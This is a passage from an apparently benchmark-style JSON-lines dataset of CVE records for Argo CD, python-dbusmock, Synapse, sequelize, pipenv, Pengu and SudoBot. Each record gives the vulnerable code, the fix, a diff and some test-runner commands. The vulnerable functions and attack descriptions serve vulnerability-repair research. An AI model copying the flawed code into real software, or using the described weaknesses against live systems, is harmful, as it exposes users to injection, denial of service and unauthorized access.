mgr.settingsMgr.GetSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\ttoken, err := jwt.ParseWithClaims(tokenString, &claims, func(token *jwt.Token) (interface{}, error) {\n\t\t// Don't forget to validate the alg is what you expect:\n\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\treturn nil, fmt.Errorf(\"Unexpected signing method: %v\", token.Header[\"alg\"])\n\t\t}\n\t\treturn settings.ServerSignature, nil\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tissuedAt, err := jwtutil.IssuedAtTime(claims)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tsubject := jwtutil.StringField(claims, \"sub\")\n\tid := jwtutil.StringField(claims, \"jti\")\n\n\tif projName, role, ok := rbacpolicy.GetProjectRoleFromSubject(subject); ok {\n\t\tproj, err := mgr.projectsLister.Get(projName)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\t_, _, err = proj.GetJWTToken(role, issuedAt.Unix(), id)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treturn token.Claims, nil\n\t}\n\n\taccount, err := mgr.settingsMgr.GetAccount(subject)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif id := jwtutil.StringField(claims, \"jti\"); id != \"\" && account.TokenIndex(id) == -1 {\n\t\treturn nil, fmt.Errorf(\"account %s does not have token with id %s\", subject, id)\n\t}\n\n\tif account.PasswordMtime != nil && issuedAt.Before(*account.PasswordMtime) {\n\t\treturn nil, fmt.Errorf(\"Account password has changed since token issued\")\n\t}\n\treturn token.Claims, nil\n}"}], "fix_func": [{"id": "fix_go_66_1", "commit": "f5b0db2", "file_path": "util/session/sessionmanager.go", "start_line": 239, "end_line": 298, "snippet": "func (mgr *SessionManager) Parse(tokenString string) (jwt.Claims, error) {\n\t// Parse takes the token string and a function for looking up the key. The latter is especially\n\t// useful if you use multiple keys for your application. The standard is to use 'kid' in the\n\t// head of the token to identify which key to use, but the parsed token (head and claims) is provided\n\t// to the callback, providing flexibility.\n\tvar claims jwt.MapClaims\n\tsettings, err := mgr.settingsMgr.GetSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\ttoken, err := jwt.ParseWithClaims(tokenString, &claims, func(token *jwt.Token) (interface{}, error) {\n\t\t// Don't forget to validate the alg is what you expect:\n\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\treturn nil, fmt.Errorf(\"Unexpected signing method: %v\", token.Header[\"alg\"])\n\t\t}\n\t\treturn settings.ServerSignature, nil\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tissuedAt, err := jwtutil.IssuedAtTime(claims)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tsubject := jwtutil.StringField(claims, \"sub\")\n\tid := jwtutil.StringField(claims, \"jti\")\n\n\tif projName, role, ok := rbacpolicy.GetProjectRoleFromSubject(subject); ok {\n\t\tproj, err := mgr.projectsLister.Get(projName)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\t_, _, err = proj.GetJWTToken(role, issuedAt.Unix(), id)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treturn token.Claims, nil\n\t}\n\n\taccount, err := mgr.settingsMgr.GetAccount(subject)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif !account.Enabled {\n\t\treturn nil, fmt.Errorf(\"account %s is disabled\", subject)\n\t}\n\n\tif id := jwtutil.StringField(claims, \"jti\"); id != \"\" && account.TokenIndex(id) == -1 {\n\t\treturn nil, fmt.Errorf(\"account %s does not have token with id %s\", subject, id)\n\t}\n\n\tif account.PasswordMtime != nil && issuedAt.Before(*account.PasswordMtime) {\n\t\treturn nil, fmt.Errorf(\"Account password has changed since token issued\")\n\t}\n\treturn token.Claims, nil\n}"}], "vul_patch": "--- a/util/session/sessionmanager.go\n+++ b/util/session/sessionmanager.go\n@@ -45,6 +45,10 @@\n \t\treturn nil, err\n \t}\n \n+\tif !account.Enabled {\n+\t\treturn nil, fmt.Errorf(\"account %s is disabled\", subject)\n+\t}\n+\n \tif id := jwtutil.StringField(claims, \"jti\"); id != \"\" && account.TokenIndex(id) == -1 {\n \t\treturn nil, fmt.Errorf(\"account %s does not have token with id %s\", subject, id)\n \t}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-26921:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/argo-cd\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd ./util/session && go test -timeout 30s -run ^TestSessionManager_AdminToken_Deactivated$ github.com/argoproj/argo-cd/util/session\n", "unit_test_cmd": null} {"cve_id": "CVE-2015-1326", "cve_description": "python-dbusmock before version 0.15.1 AddTemplate() D-Bus method call or DBusTestCase.spawn_server_template() method could be tricked into executing malicious code if an attacker supplies a .pyc file.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/martinpitt/python-dbusmock", "patch_url": ["https://github.com/martinpitt/python-dbusmock/commit/4e7d0df9093"], "programing_language": "Python", "vul_func": [{"id": "vul_py_68_1", "commit": "a4bd39f", "file_path": "dbusmock/mockobject.py", "start_line": 41, "end_line": 50, "snippet": "def load_module(name):\n if os.path.exists(name) and os.path.splitext(name)[1] == '.py':\n sys.path.insert(0, os.path.dirname(os.path.abspath(name)))\n try:\n m = os.path.splitext(os.path.basename(name))[0]\n module = importlib.import_module(m)\n finally:\n sys.path.pop(0)\n\n return module"}], "fix_func": [{"id": "fix_py_65_1", "commit": "4e7d0df9093", "file_path": "dbusmock/mockobject.py", "start_line": 42, "end_line": 49, "snippet": "def load_module(name):\n if os.path.exists(name) and os.path.splitext(name)[1] == '.py':\n mod = imp.new_module(os.path.splitext(os.path.basename(name))[0])\n with open(name) as f:\n exec(f.read(), mod.__dict__, mod.__dict__)\n return mod\n\n return importlib.import_module('dbusmock.templates.' + name)"}], "vul_patch": "--- a/dbusmock/mockobject.py\n+++ /dev/null\n@@ -1,10 +0,0 @@\n-def load_module(name):\n- if os.path.exists(name) and os.path.splitext(name)[1] == '.py':\n- sys.path.insert(0, os.path.dirname(os.path.abspath(name)))\n- try:\n- m = os.path.splitext(os.path.basename(name))[0]\n- module = importlib.import_module(m)\n- finally:\n- sys.path.pop(0)\n-\n- return module\n\n--- /dev/null\n+++ b/dbusmock/mockobject.py\n@@ -0,0 +1,8 @@\n+def load_module(name):\n+ if os.path.exists(name) and os.path.splitext(name)[1] == '.py':\n+ mod = imp.new_module(os.path.splitext(os.path.basename(name))[0])\n+ with open(name) as f:\n+ exec(f.read(), mod.__dict__, mod.__dict__)\n+ return mod\n+\n+ return importlib.import_module('dbusmock.templates.' + name)\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2015-1326:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/python-dbusmock\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2015-1326/bin/python -m pytest tests/test_api.py::TestTemplates::test_local --disable-warnings\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2015-1326:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/python-dbusmock\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2015-1326/bin/python -m pytest tests/test_api.py --disable-warnings\n"} {"cve_id": "CVE-2018-10657", "cve_description": "Matrix Synapse before 0.28.1 is prone to a denial of service flaw where malicious events injected with depth = 2^63 - 1 render rooms unusable, related to federation/federation_base.py and handlers/message.py, as exploited in the wild in April 2018.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/matrix-org/synapse", "patch_url": ["https://github.com/matrix-org/synapse/commit/33f469ba19586bbafa0cf2c7d7c35463bdab87eb"], "programing_language": "Python", "vul_func": [{"id": "vul_py_254_1", "commit": "28dd536", "file_path": "synapse/federation/federation_base.py", "start_line": 182, "end_line": 204, "snippet": "def event_from_pdu_json(pdu_json, outlier=False):\n \"\"\"Construct a FrozenEvent from an event json received over federation\n\n Args:\n pdu_json (object): pdu as received over federation\n outlier (bool): True to mark this event as an outlier\n\n Returns:\n FrozenEvent\n\n Raises:\n SynapseError: if the pdu is missing required fields\n \"\"\"\n # we could probably enforce a bunch of other fields here (room_id, sender,\n # origin, etc etc)\n assert_params_in_request(pdu_json, ('event_id', 'type'))\n event = FrozenEvent(\n pdu_json\n )\n\n event.internal_metadata.outlier = outlier\n\n return event"}, {"id": "vul_py_254_2", "commit": "28dd536", "file_path": "synapse/handlers/message.py", "start_line": 596, "end_line": 663, "snippet": " def create_new_client_event(self, builder, requester=None,\n prev_events_and_hashes=None):\n \"\"\"Create a new event for a local client\n\n Args:\n builder (EventBuilder):\n\n requester (synapse.types.Requester|None):\n\n prev_events_and_hashes (list[(str, dict[str, str], int)]|None):\n the forward extremities to use as the prev_events for the\n new event. For each event, a tuple of (event_id, hashes, depth)\n where *hashes* is a map from algorithm to hash.\n\n If None, they will be requested from the database.\n\n Returns:\n Deferred[(synapse.events.EventBase, synapse.events.snapshot.EventContext)]\n \"\"\"\n\n if prev_events_and_hashes is not None:\n assert len(prev_events_and_hashes) <= 10, \\\n \"Attempting to create an event with %i prev_events\" % (\n len(prev_events_and_hashes),\n )\n else:\n prev_events_and_hashes = \\\n yield self.store.get_prev_events_for_room(builder.room_id)\n\n if prev_events_and_hashes:\n depth = max([d for _, _, d in prev_events_and_hashes]) + 1\n else:\n depth = 1\n\n prev_events = [\n (event_id, prev_hashes)\n for event_id, prev_hashes, _ in prev_events_and_hashes\n ]\n\n builder.prev_events = prev_events\n builder.depth = depth\n\n context = yield self.state.compute_event_context(builder)\n if requester:\n context.app_service = requester.app_service\n\n if builder.is_state():\n builder.prev_state = yield self.store.add_event_hashes(\n context.prev_state_events\n )\n\n yield self.auth.add_auth_events(builder, context)\n\n signing_key = self.hs.config.signing_key[0]\n add_hashes_and_signatures(\n builder, self.server_name, signing_key\n )\n\n event = builder.build()\n\n logger.debug(\n \"Created event %s with state: %s\",\n event.event_id, context.prev_state_ids,\n )\n\n defer.returnValue(\n (event, context,)\n )"}], "fix_func": [{"id": "fix_py_254_1", "commit": "33f469b", "file_path": "synapse/federation/federation_base.py", "start_line": 185, "end_line": 219, "snippet": "def event_from_pdu_json(pdu_json, outlier=False):\n \"\"\"Construct a FrozenEvent from an event json received over federation\n\n Args:\n pdu_json (object): pdu as received over federation\n outlier (bool): True to mark this event as an outlier\n\n Returns:\n FrozenEvent\n\n Raises:\n SynapseError: if the pdu is missing required fields or is otherwise\n not a valid matrix event\n \"\"\"\n # we could probably enforce a bunch of other fields here (room_id, sender,\n # origin, etc etc)\n assert_params_in_request(pdu_json, ('event_id', 'type', 'depth'))\n\n depth = pdu_json['depth']\n if not isinstance(depth, six.integer_types):\n raise SynapseError(400, \"Depth %r not an intger\" % (depth, ),\n Codes.BAD_JSON)\n\n if depth < 0:\n raise SynapseError(400, \"Depth too small\", Codes.BAD_JSON)\n elif depth > MAX_DEPTH:\n raise SynapseError(400, \"Depth too large\", Codes.BAD_JSON)\n\n event = FrozenEvent(\n pdu_json\n )\n\n event.internal_metadata.outlier = outlier\n\n return event"}, {"id": "fix_py_254_2", "commit": "33f469b", "file_path": "synapse/handlers/message.py", "start_line": 596, "end_line": 667, "snippet": " def create_new_client_event(self, builder, requester=None,\n prev_events_and_hashes=None):\n \"\"\"Create a new event for a local client\n\n Args:\n builder (EventBuilder):\n\n requester (synapse.types.Requester|None):\n\n prev_events_and_hashes (list[(str, dict[str, str], int)]|None):\n the forward extremities to use as the prev_events for the\n new event. For each event, a tuple of (event_id, hashes, depth)\n where *hashes* is a map from algorithm to hash.\n\n If None, they will be requested from the database.\n\n Returns:\n Deferred[(synapse.events.EventBase, synapse.events.snapshot.EventContext)]\n \"\"\"\n\n if prev_events_and_hashes is not None:\n assert len(prev_events_and_hashes) <= 10, \\\n \"Attempting to create an event with %i prev_events\" % (\n len(prev_events_and_hashes),\n )\n else:\n prev_events_and_hashes = \\\n yield self.store.get_prev_events_for_room(builder.room_id)\n\n if prev_events_and_hashes:\n depth = max([d for _, _, d in prev_events_and_hashes]) + 1\n # we cap depth of generated events, to ensure that they are not\n # rejected by other servers (and so that they can be persisted in\n # the db)\n depth = min(depth, MAX_DEPTH)\n else:\n depth = 1\n\n prev_events = [\n (event_id, prev_hashes)\n for event_id, prev_hashes, _ in prev_events_and_hashes\n ]\n\n builder.prev_events = prev_events\n builder.depth = depth\n\n context = yield self.state.compute_event_context(builder)\n if requester:\n context.app_service = requester.app_service\n\n if builder.is_state():\n builder.prev_state = yield self.store.add_event_hashes(\n context.prev_state_events\n )\n\n yield self.auth.add_auth_events(builder, context)\n\n signing_key = self.hs.config.signing_key[0]\n add_hashes_and_signatures(\n builder, self.server_name, signing_key\n )\n\n event = builder.build()\n\n logger.debug(\n \"Created event %s with state: %s\",\n event.event_id, context.prev_state_ids,\n )\n\n defer.returnValue(\n (event, context,)\n )"}], "vul_patch": "--- a/synapse/federation/federation_base.py\n+++ b/synapse/federation/federation_base.py\n@@ -9,11 +9,23 @@\n FrozenEvent\n \n Raises:\n- SynapseError: if the pdu is missing required fields\n+ SynapseError: if the pdu is missing required fields or is otherwise\n+ not a valid matrix event\n \"\"\"\n # we could probably enforce a bunch of other fields here (room_id, sender,\n # origin, etc etc)\n- assert_params_in_request(pdu_json, ('event_id', 'type'))\n+ assert_params_in_request(pdu_json, ('event_id', 'type', 'depth'))\n+\n+ depth = pdu_json['depth']\n+ if not isinstance(depth, six.integer_types):\n+ raise SynapseError(400, \"Depth %r not an intger\" % (depth, ),\n+ Codes.BAD_JSON)\n+\n+ if depth < 0:\n+ raise SynapseError(400, \"Depth too small\", Codes.BAD_JSON)\n+ elif depth > MAX_DEPTH:\n+ raise SynapseError(400, \"Depth too large\", Codes.BAD_JSON)\n+\n event = FrozenEvent(\n pdu_json\n )\n\n--- a/synapse/handlers/message.py\n+++ b/synapse/handlers/message.py\n@@ -29,6 +29,10 @@\n \n if prev_events_and_hashes:\n depth = max([d for _, _, d in prev_events_and_hashes]) + 1\n+ # we cap depth of generated events, to ensure that they are not\n+ # rejected by other servers (and so that they can be persisted in\n+ # the db)\n+ depth = min(depth, MAX_DEPTH)\n else:\n depth = 1\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2016-10554", "cve_description": "sequelize is an Object-relational mapping, or a middleman to convert things from Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server into usable data for NodeJS. Before version 1.7.0-alpha3, sequelize defaulted SQLite to use MySQL backslash escaping, even though SQLite uses Postgres escaping.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/sequelize/sequelize", "patch_url": ["https://github.com/sequelize/sequelize/commit/c876192aa6ce1f67e22b26a4d175b8478615f42d"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_178_1", "commit": "7dc35e3", "file_path": "lib/sql-string.js", "start_line": 10, "end_line": 57, "snippet": "SqlString.escape = function(val, stringifyObjects, timeZone, dialect) {\n if (val === undefined || val === null) {\n return 'NULL';\n }\n\n switch (typeof val) {\n case 'boolean': return (val) ? 'true' : 'false';\n case 'number': return val+'';\n }\n\n if (val instanceof Date) {\n val = SqlString.dateToString(val, timeZone || \"Z\");\n }\n\n if (Buffer.isBuffer(val)) {\n return SqlString.bufferToString(val);\n }\n\n if (Array.isArray(val)) {\n return SqlString.arrayToList(val, timeZone);\n }\n\n if (typeof val === 'object') {\n if (stringifyObjects) {\n val = val.toString();\n } else {\n return SqlString.objectToValues(val, timeZone);\n }\n }\n\n if (dialect == \"postgres\") {\n // http://www.postgresql.org/docs/8.2/static/sql-syntax-lexical.html#SQL-SYNTAX-STRINGS\n val = val.replace(/'/g, \"''\");\n } else {\n val = val.replace(/[\\0\\n\\r\\b\\t\\\\\\'\\\"\\x1a]/g, function(s) {\n switch(s) {\n case \"\\0\": return \"\\\\0\";\n case \"\\n\": return \"\\\\n\";\n case \"\\r\": return \"\\\\r\";\n case \"\\b\": return \"\\\\b\";\n case \"\\t\": return \"\\\\t\";\n case \"\\x1a\": return \"\\\\Z\";\n default: return \"\\\\\"+s;\n }\n });\n }\n return \"'\"+val+\"'\";\n};"}], "fix_func": [{"id": "fix_js_178_1", "commit": "c876192", "file_path": "lib/sql-string.js", "start_line": 10, "end_line": 58, "snippet": "SqlString.escape = function(val, stringifyObjects, timeZone, dialect) {\n if (val === undefined || val === null) {\n return 'NULL';\n }\n\n switch (typeof val) {\n case 'boolean': return (val) ? 'true' : 'false';\n case 'number': return val+'';\n }\n\n if (val instanceof Date) {\n val = SqlString.dateToString(val, timeZone || \"Z\");\n }\n\n if (Buffer.isBuffer(val)) {\n return SqlString.bufferToString(val);\n }\n\n if (Array.isArray(val)) {\n return SqlString.arrayToList(val, timeZone);\n }\n\n if (typeof val === 'object') {\n if (stringifyObjects) {\n val = val.toString();\n } else {\n return SqlString.objectToValues(val, timeZone);\n }\n }\n\n if (dialect === \"postgres\" || dialect === \"sqlite\") {\n // http://www.postgresql.org/docs/8.2/static/sql-syntax-lexical.html#SQL-SYNTAX-STRINGS\n // http://stackoverflow.com/q/603572/130598\n val = val.replace(/'/g, \"''\");\n } else {\n val = val.replace(/[\\0\\n\\r\\b\\t\\\\\\'\\\"\\x1a]/g, function(s) {\n switch(s) {\n case \"\\0\": return \"\\\\0\";\n case \"\\n\": return \"\\\\n\";\n case \"\\r\": return \"\\\\r\";\n case \"\\b\": return \"\\\\b\";\n case \"\\t\": return \"\\\\t\";\n case \"\\x1a\": return \"\\\\Z\";\n default: return \"\\\\\"+s;\n }\n });\n }\n return \"'\"+val+\"'\";\n};"}], "vul_patch": "--- a/lib/sql-string.js\n+++ b/lib/sql-string.js\n@@ -28,8 +28,9 @@\n }\n }\n \n- if (dialect == \"postgres\") {\n+ if (dialect === \"postgres\" || dialect === \"sqlite\") {\n // http://www.postgresql.org/docs/8.2/static/sql-syntax-lexical.html#SQL-SYNTAX-STRINGS\n+ // http://stackoverflow.com/q/603572/130598\n val = val.replace(/'/g, \"''\");\n } else {\n val = val.replace(/[\\0\\n\\r\\b\\t\\\\\\'\\\"\\x1a]/g, function(s) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-21668", "cve_description": "pipenv is a Python development workflow tool. Starting with version 2018.10.9 and prior to version 2022.1.8, a flaw in pipenv's parsing of requirements files allows an attacker to insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems. If an attacker is able to hide a malicious `--index-url` option in a requirements file that a victim installs with pipenv, the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim's host during installation (remote code execution/RCE). When pip installs from a source distribution, any code in the setup.py is executed by the install process. This issue is patched in version 2022.1.8. The GitHub Security Advisory contains more information about this vulnerability.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/pypa/pipenv", "patch_url": ["https://github.com/pypa/pipenv/commit/439782a8ae36c4762c88e43d5f0d8e563371b46f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_411_1", "commit": "9cb42e1acb0c36d706cccfaa01e296fcebc8a8b0", "file_path": "pipenv/core.py", "start_line": 147, "end_line": 190, "snippet": "def import_requirements(project, r=None, dev=False):\n from pipenv.patched.notpip._vendor import requests as pip_requests\n from pipenv.patched.notpip._internal.req.constructors import install_req_from_parsed_requirement\n from pipenv.vendor.pip_shims.shims import parse_requirements\n\n # Parse requirements.txt file with Pip's parser.\n # Pip requires a `PipSession` which is a subclass of requests.Session.\n # Since we're not making any network calls, it's initialized to nothing.\n if r:\n assert os.path.isfile(r)\n # Default path, if none is provided.\n if r is None:\n r = project.requirements_location\n with open(r) as f:\n contents = f.read()\n indexes = []\n trusted_hosts = []\n # Find and add extra indexes.\n for line in contents.split(\"\\n\"):\n index, extra_index, trusted_host, _ = parse_indexes(line.strip(), strict=True)\n if index:\n indexes = [index]\n if extra_index:\n indexes.append(extra_index)\n if trusted_host:\n trusted_hosts.append(trusted_host)\n indexes = sorted(set(indexes))\n trusted_hosts = sorted(set(trusted_hosts))\n reqs = [install_req_from_parsed_requirement(f) for f in parse_requirements(r, session=pip_requests)]\n for package in reqs:\n if package.name not in BAD_PACKAGES:\n if package.link is not None:\n package_string = (\n f\"-e {package.link}\"\n if package.editable\n else str(package.link)\n )\n project.add_package_to_pipfile(package_string, dev=dev)\n else:\n project.add_package_to_pipfile(str(package.req), dev=dev)\n for index in indexes:\n trusted = index in trusted_hosts\n project.add_index_to_pipfile(index, verify_ssl=trusted)\n project.recase_pipfile()"}], "fix_func": [{"id": "fix_py_411_1", "commit": "439782a8ae36c4762c88e43d5f0d8e563371b46f", "file_path": "pipenv/core.py", "start_line": 147, "end_line": 195, "snippet": "def import_requirements(project, r=None, dev=False):\n from pipenv.patched.notpip._vendor import requests as pip_requests\n from pipenv.patched.notpip._internal.req.constructors import install_req_from_parsed_requirement\n from pipenv.vendor.pip_shims.shims import parse_requirements\n\n # Parse requirements.txt file with Pip's parser.\n # Pip requires a `PipSession` which is a subclass of requests.Session.\n # Since we're not making any network calls, it's initialized to nothing.\n if r:\n assert os.path.isfile(r)\n # Default path, if none is provided.\n if r is None:\n r = project.requirements_location\n with open(r) as f:\n contents = f.read()\n indexes = []\n trusted_hosts = []\n # Find and add extra indexes.\n for line in contents.split(\"\\n\"):\n index, extra_index, trusted_host, _ = parse_indexes(line.strip(), strict=True)\n if index:\n indexes = [index]\n if extra_index:\n indexes.append(extra_index)\n if trusted_host:\n trusted_hosts.append(get_host_and_port(trusted_host))\n indexes = sorted(set(indexes))\n trusted_hosts = sorted(set(trusted_hosts))\n reqs = [install_req_from_parsed_requirement(f) for f in parse_requirements(r, session=pip_requests)]\n for package in reqs:\n if package.name not in BAD_PACKAGES:\n if package.link is not None:\n package_string = (\n f\"-e {package.link}\"\n if package.editable\n else str(package.link)\n )\n project.add_package_to_pipfile(package_string, dev=dev)\n else:\n project.add_package_to_pipfile(str(package.req), dev=dev)\n for index in indexes:\n # don't require HTTPS for trusted hosts (see: https://pip.pypa.io/en/stable/cli/pip/#cmdoption-trusted-host)\n host_and_port = get_host_and_port(index)\n require_valid_https = not any((v in trusted_hosts for v in (\n host_and_port,\n host_and_port.partition(':')[0], # also check if hostname without port is in trusted_hosts\n )))\n project.add_index_to_pipfile(index, verify_ssl=require_valid_https)\n project.recase_pipfile()"}, {"id": "fix_py_411_2", "commit": "439782a8ae36c4762c88e43d5f0d8e563371b46f", "file_path": "pipenv/utils.py", "start_line": 1646, "end_line": 1667, "snippet": "def get_host_and_port(url):\n \"\"\"Get the host, or the host:port pair if port is explicitly included, for the given URL.\n\n Examples:\n >>> get_host_and_port('example.com')\n 'example.com'\n >>> get_host_and_port('example.com:443')\n 'example.com:443'\n >>> get_host_and_port('http://example.com')\n 'example.com'\n >>> get_host_and_port('https://example.com/')\n 'example.com'\n >>> get_host_and_port('https://example.com:8081')\n 'example.com:8081'\n >>> get_host_and_port('ssh://example.com')\n 'example.com'\n\n :param url: the URL string to parse\n :return: a string with the host:port pair if the URL includes port number explicitly; otherwise, returns host only\n \"\"\"\n url = urllib3_util.parse_url(url)\n return '{}:{}'.format(url.host, url.port) if url.port else url.host"}], "vul_patch": "--- a/pipenv/core.py\n+++ b/pipenv/core.py\n@@ -23,7 +23,7 @@\n if extra_index:\n indexes.append(extra_index)\n if trusted_host:\n- trusted_hosts.append(trusted_host)\n+ trusted_hosts.append(get_host_and_port(trusted_host))\n indexes = sorted(set(indexes))\n trusted_hosts = sorted(set(trusted_hosts))\n reqs = [install_req_from_parsed_requirement(f) for f in parse_requirements(r, session=pip_requests)]\n@@ -39,6 +39,11 @@\n else:\n project.add_package_to_pipfile(str(package.req), dev=dev)\n for index in indexes:\n- trusted = index in trusted_hosts\n- project.add_index_to_pipfile(index, verify_ssl=trusted)\n+ # don't require HTTPS for trusted hosts (see: https://pip.pypa.io/en/stable/cli/pip/#cmdoption-trusted-host)\n+ host_and_port = get_host_and_port(index)\n+ require_valid_https = not any((v in trusted_hosts for v in (\n+ host_and_port,\n+ host_and_port.partition(':')[0], # also check if hostname without port is in trusted_hosts\n+ )))\n+ project.add_index_to_pipfile(index, verify_ssl=require_valid_https)\n project.recase_pipfile()\n\n--- /dev/null\n+++ b/pipenv/core.py\n@@ -0,0 +1,22 @@\n+def get_host_and_port(url):\n+ \"\"\"Get the host, or the host:port pair if port is explicitly included, for the given URL.\n+\n+ Examples:\n+ >>> get_host_and_port('example.com')\n+ 'example.com'\n+ >>> get_host_and_port('example.com:443')\n+ 'example.com:443'\n+ >>> get_host_and_port('http://example.com')\n+ 'example.com'\n+ >>> get_host_and_port('https://example.com/')\n+ 'example.com'\n+ >>> get_host_and_port('https://example.com:8081')\n+ 'example.com:8081'\n+ >>> get_host_and_port('ssh://example.com')\n+ 'example.com'\n+\n+ :param url: the URL string to parse\n+ :return: a string with the host:port pair if the URL includes port number explicitly; otherwise, returns host only\n+ \"\"\"\n+ url = urllib3_util.parse_url(url)\n+ return '{}:{}'.format(url.host, url.port) if url.port else url.host\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-36623", "cve_description": "A vulnerability was found in Pengu. It has been declared as problematic. Affected by this vulnerability is the function runApp of the file src/index.js. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The name of the patch is aea66f12b8cdfc3c8c50ad6a9c89d8307e9d0a91. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216475.", "cwe_info": {"CWE-352": {"name": "Cross-Site Request Forgery (CSRF)", "description": "The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor. "}}, "repo": "https://github.com/jtojnar/pengu", "patch_url": ["https://github.com/jtojnar/pengu/commit/aea66f12b8cdfc3c8c50ad6a9c89d8307e9d0a91"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_301_1", "commit": "6ccc64f6f9135f938cf7123d2f7aaea78b39a622", "file_path": "src/index.js", "start_line": 71, "end_line": 73, "snippet": "\tfunction originIsAllowed() {\n\t\treturn true;\n\t}"}], "fix_func": [{"id": "fix_js_301_1", "commit": "aea66f12b8cdfc3c8c50ad6a9c89d8307e9d0a91", "file_path": "src/index.js", "start_line": 73, "end_line": 76, "snippet": "\tfunction originIsAllowed(origin) {\n\t\tconst url = new URL(origin);\n\t\treturn acceptedOrigins.includes(url.hostname);\n\t}"}, {"id": "fix_js_301_2", "commit": "aea66f12b8cdfc3c8c50ad6a9c89d8307e9d0a91", "file_path": "src/index.js", "start_line": 31, "end_line": 31, "snippet": "const acceptedOrigins = process.env.ACCEPTED_ORIGINS ? process.env.ACCEPTED_ORIGINS.split(',') : ['localhost', '127.0.0.1'];"}], "vul_patch": "--- a/src/index.js\n+++ b/src/index.js\n@@ -1,3 +1,4 @@\n-\tfunction originIsAllowed() {\n-\t\treturn true;\n+\tfunction originIsAllowed(origin) {\n+\t\tconst url = new URL(origin);\n+\t\treturn acceptedOrigins.includes(url.hostname);\n \t}\n\n--- /dev/null\n+++ b/src/index.js\n@@ -0,0 +1 @@\n+const acceptedOrigins = process.env.ACCEPTED_ORIGINS ? process.env.ACCEPTED_ORIGINS.split(',') : ['localhost', '127.0.0.1'];\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-45307", "cve_description": "SudoBot, a Discord moderation bot, is vulnerable to privilege escalation and exploit of the `-config` command in versions prior to 9.26.7. Anyone is theoretically able to update any configuration of the bot and potentially gain control over the bot's settings. Every version of v9 before v9.26.7 is affected. Other versions (e.g. v8) are not affected. Users should upgrade to version 9.26.7 to receive a patch. A workaround would be to create a command permission overwrite in the Database. A SQL statement provided in the GitHub Security Advisor can be executed to create a overwrite that disallows users without `ManageGuild` permission to run the `-config` command. Run the SQL statement for every server the bot is in, and replace `` with the appropriate Guild ID each time.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}}, "repo": "https://github.com/onesoft-sudo/sudobot", "patch_url": ["https://github.com/onesoft-sudo/sudobot/commit/ef46ca98562f3c1abef4ff7dd94d8f7b8155ee50"], 